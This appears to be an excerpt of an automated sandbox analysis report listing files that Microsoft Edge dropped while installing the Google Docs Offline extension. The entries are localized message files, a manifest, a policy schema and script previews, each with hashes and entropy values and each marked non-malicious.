                                                                                                                                                                            Entropy (8bit):4.132139619026436
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                            MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                            SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                            SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                            SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1969
                                                                                                                                                                            Entropy (8bit):4.327258153043599
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                            MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                            SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                            SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                            SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1674
                                                                                                                                                                            Entropy (8bit):4.343724179386811
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                            MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                            SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                            SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                            SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1063
                                                                                                                                                                            Entropy (8bit):4.853399816115876
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                            MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                            SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                            SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                            SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1333
                                                                                                                                                                            Entropy (8bit):4.686760246306605
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                            MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                            SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                            SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                            SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1263
                                                                                                                                                                            Entropy (8bit):4.861856182762435
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                            MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                            SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                            SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                            SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1074
                                                                                                                                                                            Entropy (8bit):5.062722522759407
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                            MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                            SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                            SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                            SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                            Entropy (8bit):5.7905809868505544
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                            MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                            SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                            SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                            SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1205
                                                                                                                                                                            Entropy (8bit):4.50367724745418
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                            MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                            SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                            SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                            SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                            Entropy (8bit):5.76581227215314
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                            MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                            SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                            SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                            SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):912
                                                                                                                                                                            Entropy (8bit):4.65963951143349
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                            MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                            SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                            SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                            SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11280
                                                                                                                                                                            Entropy (8bit):5.751992630887702
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                            MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                            SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                            SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                            SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                            Entropy (8bit):4.284628987131403
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                            MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                            SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                            SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                            SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2525
                                                                                                                                                                            Entropy (8bit):5.417833205646285
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                            MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                            SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                            SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                            SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                            Entropy (8bit):4.862433271815736
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                            MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                            SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                            SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                            SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):98880
                                                                                                                                                                            Entropy (8bit):5.414989230634404
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                            MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                            SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                            SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                            SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):291
                                                                                                                                                                            Entropy (8bit):4.65176400421739
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                            MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                            SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                            SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                            SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):107677
                                                                                                                                                                            Entropy (8bit):5.396220758526552
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
